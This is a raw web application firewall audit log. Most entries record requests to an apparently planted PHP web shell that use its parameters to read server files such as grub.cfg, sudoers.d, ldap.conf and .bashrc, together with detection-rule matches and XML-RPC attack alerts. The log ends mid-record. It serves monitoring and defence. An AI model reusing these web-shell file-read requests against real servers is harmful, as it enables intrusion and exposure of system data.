127.0.0.1 7081 --61d3476d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fboot%2Fgrub&viewfile=%2F%2Fproc%2Fself%2Froot%2Fboot%2Fgrub%2Fgrub.cfg HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --61d3476d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4718 Connection: close Content-Type: text/html; charset=UTF-8 --61d3476d-H-- Message: Warning. Matched phrase "boot/grub/grub.cfg" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: boot/grub/grub.cfg found within ARGS:viewfile: /proc/self/root/boot/grub/grub.cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "boot/grub/grub.cfg" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: boot/grub/grub.cfg found within ARGS:viewfile: /proc/self/root/boot/grub/grub.cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBshhwcFb_n1P0IC9xnUgAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101126042016 4626 (- - -) Stopwatch2: 1750101126042016 4626; combined=2432, p1=361, p2=1919, p3=40, p4=38, p5=74, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --61d3476d-Z-- --42367d3c-A-- [17/Jun/2025:00:42:29.381268 +0530] aFBsnVJfblPUQiSn5r1jsAAAAAA 18.213.240.226 42850 127.0.0.1 7081 --42367d3c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/161 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.213.240.226 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --42367d3c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --42367d3c-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/161"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/161"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBsnVJfblPUQiSn5r1jsAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101149377271 4049 (- - -) Stopwatch2: 1750101149377271 4049; combined=2023, p1=353, p2=1558, p3=34, p4=25, p5=53, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --42367d3c-Z-- --0bb9b222-A-- [17/Jun/2025:00:42:44.635399 +0530] aFBsrBwcFb_n1P0IC9xncwAAAAo 44.205.74.196 37382 127.0.0.1 7081 --0bb9b222-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/37 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.205.74.196 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --0bb9b222-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --0bb9b222-H-- Message: Warning. Matched phrase "proc/self/fd/3" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/3 found within ARGS:viewfile: /proc/self/fd/37"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/3" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/3 found within ARGS:viewfile: /proc/self/fd/37"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBsrBwcFb_n1P0IC9xncwAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101164631242 4208 (- - -) Stopwatch2: 1750101164631242 4208; combined=2250, p1=325, p2=1798, p3=41, p4=28, p5=58, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0bb9b222-Z-- --6090607f-A-- [17/Jun/2025:00:42:50.995409 +0530] aFBssu2BajTuKRK3FvJ9CgAAAAE 216.73.216.71 43168 127.0.0.1 7081 --6090607f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fnet&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fnet%2Fudplite6 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6090607f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3057 Connection: close Content-Type: text/html; charset=UTF-8 --6090607f-H-- Message: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/self/root/proc/net/udplite6"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/self/root/proc/net/udplite6"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBssu2BajTuKRK3FvJ9CgAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101170990969 4518 (- - -) Stopwatch2: 1750101170990969 4518; combined=2374, p1=429, p2=1797, p3=37, p4=45, p5=66, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6090607f-Z-- --48f2e016-A-- [17/Jun/2025:00:42:52.566329 +0530] aFBstH3hoSwVUy254pH2ZAAAACQ 52.71.216.196 43392 127.0.0.1 7081 --48f2e016-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/14 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.71.216.196 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --48f2e016-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --48f2e016-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/14"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/14"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBstH3hoSwVUy254pH2ZAAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101172562228 4152 (- - -) Stopwatch2: 1750101172562228 4152; combined=2165, p1=346, p2=1698, p3=40, p4=25, p5=56, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --48f2e016-Z-- --79c11674-A-- [17/Jun/2025:00:42:56.009885 +0530] aFBsuJVkCcfT-Z8NQYyW8QAAAAc 216.73.216.71 43794 127.0.0.1 7081 --79c11674-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsudoers.d&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsudoers.d%2FREADME HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --79c11674-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2995 Connection: close Content-Type: text/html; charset=UTF-8 --79c11674-H-- Message: Warning. Matched phrase "etc/sudoers" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:path: /snap/core20/2582/etc/sudoers.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/sudoers" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:viewfile: /snap/core20/2582/etc/sudoers.d/readme"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sudoers" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:path: /snap/core20/2582/etc/sudoers.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBsuJVkCcfT-Z8NQYyW8QAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sudoers" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:viewfile: /snap/core20/2582/etc/sudoers.d/readme"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBsuJVkCcfT-Z8NQYyW8QAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101176005300 4640 (- - -) Stopwatch2: 1750101176005300 4640; combined=2656, p1=383, p2=2106, p3=42, p4=32, p5=93, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79c11674-Z-- --861f1b6a-A-- [17/Jun/2025:00:43:04.116879 +0530] aFBsv5lL5_2Zd8wUdfLLNAAAAAg 34.68.37.79 33734 127.0.0.1 7081 --861f1b6a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --861f1b6a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --861f1b6a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBsv5lL5_2Zd8wUdfLLNAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101183398957 717992 (- - -) Stopwatch2: 1750101183398957 717992; combined=2509, p1=400, p2=1605, p3=52, p4=86, p5=224, sr=120, sw=142, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --861f1b6a-Z-- --e46f5026-A-- [17/Jun/2025:00:43:12.516565 +0530] aFBsyCid3pHxA3RhGpzsUQAAAAk 54.83.23.103 53208 127.0.0.1 7081 --e46f5026-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/162 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.83.23.103 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --e46f5026-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --e46f5026-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/162"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/162"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBsyCid3pHxA3RhGpzsUQAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101192511129 5504 (- - -) Stopwatch2: 1750101192511129 5504; combined=3076, p1=471, p2=2442, p3=50, p4=35, p5=78, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e46f5026-Z-- --3c6c2205-A-- [17/Jun/2025:00:43:36.208546 +0530] aFBs4FJfblPUQiSn5r1j-AAAAAA 216.73.216.71 58576 127.0.0.1 7081 --3c6c2205-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity%2Fuser_map.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3c6c2205-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3111 Connection: close Content-Type: text/html; charset=UTF-8 --3c6c2205-H-- Message: Warning. Matched phrase "etc/security/user" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/user found within ARGS:viewfile: /proc/self/root/etc/security/user_map.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/user" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/user found within ARGS:viewfile: /proc/self/root/etc/security/user_map.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBs4FJfblPUQiSn5r1j-AAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101216204384 4216 (- - -) Stopwatch2: 1750101216204384 4216; combined=2112, p1=344, p2=1644, p3=34, p4=33, p5=57, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3c6c2205-Z-- --2212e73a-A-- [17/Jun/2025:00:43:42.036212 +0530] aFBs5lJfblPUQiSn5r1kAgAAAAA 216.73.216.71 38244 127.0.0.1 7081 --2212e73a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d%2F01-locale-fix.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --2212e73a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3057 Connection: close Content-Type: text/html; charset=UTF-8 --2212e73a-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/01-locale-fix.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBs5lJfblPUQiSn5r1kAgAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/01-locale-fix.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBs5lJfblPUQiSn5r1kAgAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101222031971 4295 (- - -) Stopwatch2: 1750101222031971 4295; combined=2416, p1=367, p2=1873, p3=41, p4=32, p5=103, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2212e73a-Z-- --f8c8596b-A-- [17/Jun/2025:00:43:44.044019 +0530] aFBs6Cid3pHxA3RhGpzscgAAAAk 216.73.216.71 38498 127.0.0.1 7081 --f8c8596b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fldap&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fldap%2Fldap.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f8c8596b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3197 Connection: close Content-Type: text/html; charset=UTF-8 --f8c8596b-H-- Message: Warning. Matched phrase "etc/ldap/ldap.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ldap/ldap.conf found within ARGS:viewfile: /proc/self/root/etc/ldap/ldap.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ldap/ldap.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ldap/ldap.conf found within ARGS:viewfile: /proc/self/root/etc/ldap/ldap.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBs6Cid3pHxA3RhGpzscgAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101224038443 5644 (- - -) Stopwatch2: 1750101224038443 5644; combined=3036, p1=456, p2=2407, p3=49, p4=53, p5=71, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f8c8596b-Z-- --369c5f3b-A-- [17/Jun/2025:00:44:04.239193 +0530] aFBs-43q6eGJ2xNcTd6JWgAAAAU 34.68.37.79 47152 127.0.0.1 7081 --369c5f3b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --369c5f3b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --369c5f3b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBs-43q6eGJ2xNcTd6JWgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101243491656 747592 (- - -) Stopwatch2: 1750101243491656 747592; combined=2356, p1=370, p2=1614, p3=40, p4=63, p5=169, sr=103, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --369c5f3b-Z-- --dd2dcf34-A-- [17/Jun/2025:00:44:31.722595 +0530] aFBtF5lL5_2Zd8wUdfLLjAAAAAg 216.73.216.71 40996 127.0.0.1 7081 --dd2dcf34-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fskel&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fskel%2F.bashrc HTTP/1.0 